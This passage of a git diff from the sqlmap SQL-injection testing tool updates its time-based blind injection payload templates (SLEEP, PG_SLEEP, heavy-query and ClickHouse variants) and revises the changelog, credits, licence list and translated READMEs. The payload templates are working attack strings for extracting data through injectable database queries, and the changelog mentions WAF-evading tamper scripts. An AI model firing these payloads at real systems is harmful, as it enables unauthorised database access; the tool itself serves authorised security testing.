+ RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])#
@@ -335,7 +419,7 @@
531
- 1,2,3,9
+ 1,2,3,8,91AND ELT([INFERENCE],SLEEP([SLEEPTIME]))
@@ -414,7 +498,7 @@
511
- 1,2,3,9
+ 1,2,3,8,91AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
@@ -496,7 +580,7 @@
522
- 1,2,3,9
+ 1,2,3,8,91AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
@@ -586,7 +670,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -608,7 +691,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -617,7 +699,7 @@
522
- 1,2,3,9
+ 1,2,3,8,91AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
@@ -629,7 +711,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -650,7 +731,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -672,7 +752,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -694,7 +773,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -937,7 +1015,7 @@
532
- 1,9
+ 1,8,91AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
@@ -1416,6 +1494,44 @@
+
+ Codestin Search App
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
+
+ Codestin Search App
+ 5
+ 5
+ 3
+ 1,2,3
+ 1
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))
+
+ OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))
+
+
+
+
+
+ ClickHouse
+
+
+
@@ -1490,9 +1606,9 @@
11,2,3,93
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
@@ -1504,7 +1620,7 @@
- Codestin Search App
+ Codestin Search App542
@@ -1519,7 +1635,27 @@
MySQL
- <= 5.0.11
+ < 5.0.12
+
+
+
+
+ Codestin Search App
+ 5
+ 5
+ 2
+ 1,2,3,9
+ 3
+ IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
+
+ (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
+
+
+
+
+
+ MySQL
+ > 5.0.12
@@ -1636,7 +1772,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -1783,7 +1918,7 @@
421,2,3,9
- 1
+ 3(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
@@ -1803,7 +1938,7 @@
521,2,3,9
- 1
+ 3(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
@@ -1859,7 +1994,7 @@
- Codestin Search App
+ Codestin Search App542
@@ -1874,7 +2009,7 @@
MySQL
- <= 5.0.11
+ < 5.0.12
@@ -1934,7 +2069,6 @@
Microsoft SQL ServerSybase
- Windows
diff --git a/xml/payloads/union_query.xml b/data/xml/payloads/union_query.xml
similarity index 100%
rename from xml/payloads/union_query.xml
rename to data/xml/payloads/union_query.xml
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
new file mode 100644
index 00000000000..37a4b0c2a6e
--- /dev/null
+++ b/data/xml/queries.xml
@@ -0,0 +1,1788 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ />
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
index 1e3284055da..5eab5958460 100644
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,9 +1,54 @@
+# Version 1.9 (2025-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1)
+
+# Version 1.8 (2024-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1)
+
+# Version 1.7 (2023-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
+# Version 1.6 (2022-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
+
+# Version 1.5 (2021-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
+
+# Version 1.4 (2020-01-01)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
+
+# Version 1.3 (2019-01-05)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
+
+# Version 1.2 (2018-01-08)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
+
+# Version 1.1 (2017-04-07)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
+
# Version 1.0 (2016-02-27)
* Implemented support for automatic decoding of page content through detected charset.
* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
* Major improvements to program stabilization based on user reports.
-* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
+* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
* Fixed major bug with DNS leaking in Tor mode.
* Added wordlist compilation made of the most popular cracking dictionaries.
* Implemented multi-processor hash cracking routine(s).
@@ -23,7 +68,7 @@
* Added option `--csv-del` for manually setting delimiting character used in CSV output.
* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
-* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
+* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
* Major improvements to switches `--tables` and `--columns`.
@@ -55,7 +100,7 @@
* Added option `--host` to set the HTTP Host header value.
* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
-* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
@@ -78,7 +123,7 @@
* Added option `--skip` to skip testing of given parameter(s).
* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
* Added switch `--skip-urlencode` to skip URL encoding of payload data.
-* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
@@ -151,7 +196,7 @@
* Major code cleanup.
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
* Updated user's manual.
-* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.
# Version 0.8 release candidate (2009-09-21)
@@ -323,7 +368,7 @@
* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
-* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ;
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ;
* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
* Improved logging functionality: passed from banal 'print' to Python native logging library;
* Added support for more than one parameter in `-p` command line option;
diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf
deleted file mode 100644
index 0a17b98f32b..00000000000
Binary files a/doc/FAQ.pdf and /dev/null differ
diff --git a/doc/README.pdf b/doc/README.pdf
deleted file mode 100644
index fd5e4f72a95..00000000000
Binary files a/doc/README.pdf and /dev/null differ
diff --git a/doc/THANKS.md b/doc/THANKS.md
index 6e9f85819ef..3d5e9ec7e75 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -109,9 +109,15 @@ Alessandro Curio,
Alessio Dalla Piazza,
* for reporting a couple of bugs
+Alexis Danizan,
+* for contributing support for ClickHouse
+
Sherif El-Deeb,
* for reporting a minor bug
+Thomas Etrillard,
+* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
+
Stefano Di Paola,
* for suggesting good features
@@ -148,11 +154,6 @@ Giorgio Fedon,
Kasper Fons,
* for reporting several bugs
-Jose Fonseca,
-* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
- http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
- http://code.google.com/p/jrfonseca/wiki/XDot
-
Alan Franzoni,
* for helping out with Python subprocess library
@@ -202,7 +203,7 @@ Tate Hansen,
Mario Heiderich,
Christian Matthies,
Lars H. Strojny,
-* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
+* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS
Kristian Erik Hermansen,
* for reporting a bug
@@ -317,6 +318,9 @@ Michael Majchrowicz,
Vinícius Henrique Marangoni,
* for contributing a Portuguese translation of README.md
+Francesco Marano,
+* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
+
Ahmad Maulana,
* for contributing a tamper script halfversionedmorekeywords.py
@@ -486,6 +490,9 @@ Marek Sarvas,
Philippe A. R. Schaeffer,
* for reporting a minor bug
+Henri Salo
+* for a donation
+
Mohd Zamiri Sanin,
* for reporting a minor bug
@@ -565,6 +572,9 @@ Efrain Torres,
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
* for his great Metasploit WMAP Framework
+Jennifer Torres,
+* for contributing a tamper script luanginx.py
+
Sandro Tosi,
* for helping to create sqlmap Debian package correctly
@@ -597,6 +607,7 @@ Carlos Gabriel Vergara,
Patrick Webster,
* for suggesting an enhancement
+* for donating to sqlmap development (from OSI.Security)
Ed Williams,
* for suggesting a minor enhancement
@@ -726,6 +737,9 @@ rmillet,
Rub3nCT,
* for reporting a minor bug
+sapra,
+* for helping out with Python multiprocessing library on MacOS
+
shiftzwei,
* for reporting a couple of bugs
@@ -760,6 +774,12 @@ ultramegaman,
Vinicius,
* for reporting a minor bug
+virusdefender
+* for contributing WAF scripts safeline.py
+
+w8ay
+* for contributing an implementation for chunked transfer-encoding (switch --chunked)
+
wanglei,
* for reporting a minor bug
diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md
index 2bf01b6ea02..76d9e8fe350 100644
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -2,27 +2,22 @@ This file lists bundled packages and their associated licensing terms.
# BSD
-* The Ansistrm library located under thirdparty/ansistrm/.
+* The `Ansistrm` library located under `thirdparty/ansistrm/`.
Copyright (C) 2010-2012, Vinay Sajip.
-* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`.
Copyright (C) 2004-2010, Leonard Richardson.
-* The ClientForm library located under thirdparty/clientform/.
+* The `ClientForm` library located under `thirdparty/clientform/`.
Copyright (C) 2002-2007, John J. Lee.
Copyright (C) 2005, Gary Poster.
Copyright (C) 2005, Zope Corporation.
Copyright (C) 1998-2000, Gisle Aas.
-* The Colorama library located under thirdparty/colorama/.
+* The `Colorama` library located under `thirdparty/colorama/`.
Copyright (C) 2013, Jonathan Hartley.
-* The Fcrypt library located under thirdparty/fcrypt/.
+* The `Fcrypt` library located under `thirdparty/fcrypt/`.
Copyright (C) 2000, 2001, 2004 Carey Evans.
-* The Odict library located under thirdparty/odict/.
- Copyright (C) 2005, Nicola Larosa, Michael Foord.
-* The Oset library located under thirdparty/oset/.
- Copyright (C) 2010, BlueDynamics Alliance, Austria.
- Copyright (C) 2009, Raymond Hettinger, and others.
-* The PrettyPrint library located under thirdparty/prettyprint/.
+* The `PrettyPrint` library located under `thirdparty/prettyprint/`.
Copyright (C) 2010, Chris Hall.
-* The SocksiPy library located under thirdparty/socks/.
+* The `SocksiPy` library located under `thirdparty/socks/`.
Copyright (C) 2006, Dan-Haim.
````
@@ -51,17 +46,13 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# LGPL
-* The Chardet library located under thirdparty/chardet/.
+* The `Chardet` library located under `thirdparty/chardet/`.
Copyright (C) 2008, Mark Pilgrim.
-* The Gprof2dot library located under thirdparty/gprof2dot/.
- Copyright (C) 2008-2009, Jose Fonseca.
-* The KeepAlive library located under thirdparty/keepalive/.
+* The `KeepAlive` library located under `thirdparty/keepalive/`.
Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipart/.
+* The `MultipartPost` library located under `thirdparty/multipart/`.
Copyright (C) 2006, Will Holcomb.
-* The XDot library located under thirdparty/xdot/.
- Copyright (C) 2008, Jose Fonseca.
-* The icmpsh tool located under extra/icmpsh/.
+* The `icmpsh` tool located under `extra/icmpsh/`.
Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
````
@@ -234,7 +225,7 @@ Library.
# PSF
-* The Magic library located under thirdparty/magic/.
+* The `Magic` library located under `thirdparty/magic/`.
Copyright (C) 2011, Adam Hupp.
````
@@ -279,9 +270,15 @@ be bound by the terms and conditions of this License Agreement.
# MIT
-* The bottle web framework library located under thirdparty/bottle/.
+* The `bottle` web framework library located under `thirdparty/bottle/`.
Copyright (C) 2012, Marcel Hellkamp.
-* The Termcolor library located under thirdparty/termcolor/.
+* The `identYwaf` library located under `thirdparty/identywaf/`.
+ Copyright (C) 2019-2020, Miroslav Stampar.
+* The `ordereddict` library located under `thirdparty/odict/`.
+ Copyright (C) 2009, Raymond Hettinger.
+* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.
+ Copyright (C) 2010-2018, Benjamin Peterson.
+* The `Termcolor` library located under `thirdparty/termcolor/`.
Copyright (C) 2008-2011, Volvox Development Team.
````
@@ -308,7 +305,7 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Public domain
-* The PyDes library located under thirdparty/pydes/.
+* The `PyDes` library located under `thirdparty/pydes/`.
Copyleft 2009, Todd Whiteman.
-* The win_inet_pton library located under thirdparty/wininetpton/.
+* The `win_inet_pton` library located under `thirdparty/wininetpton/`.
Copyleft 2014, Ryan Vennell.
diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md
index 80daf852bca..af3de550924 100644
--- a/doc/translations/README-bg-BG.md
+++ b/doc/translations/README-bg-BG.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
@@ -20,7 +20,7 @@ sqlmap e инструмент за тестване и проникване, с
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
+sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи.
Използване
----
@@ -39,12 +39,12 @@ sqlmap работи самостоятелно с [Python](http://www.python.org
Връзки
----
-* Начална страница: http://sqlmap.org
+* Начална страница: https://sqlmap.org
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ckb-KU.md b/doc/translations/README-ckb-KU.md
new file mode 100644
index 00000000000..6bb8fca22bc
--- /dev/null
+++ b/doc/translations/README-ckb-KU.md
@@ -0,0 +1,67 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+
+
+
+بۆ بینینی [کۆمەڵێک سکرین شات و سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت.
+
+
+دامەزراندن
+----
+
+بۆ دابەزاندنی نوێترین وەشانی tarball، کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت.
+
+باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap):
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap لە دەرەوەی سندوق کاردەکات لەگەڵ [Python](https://www.python.org/download/) وەشانی **2.6**، **2.7** و **3.x** لەسەر هەر پلاتفۆرمێک.
+
+چۆنیەتی بەکارهێنان
+----
+
+بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان و سویچەکان ئەمانە بەکاربهێنە:
+
+ python sqlmap.py -h
+
+بۆ بەدەستهێنانی لیستی هەموو بژاردە و سویچەکان ئەمە بەکار بێنا:
+
+ python sqlmap.py -hh
+
+دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601).
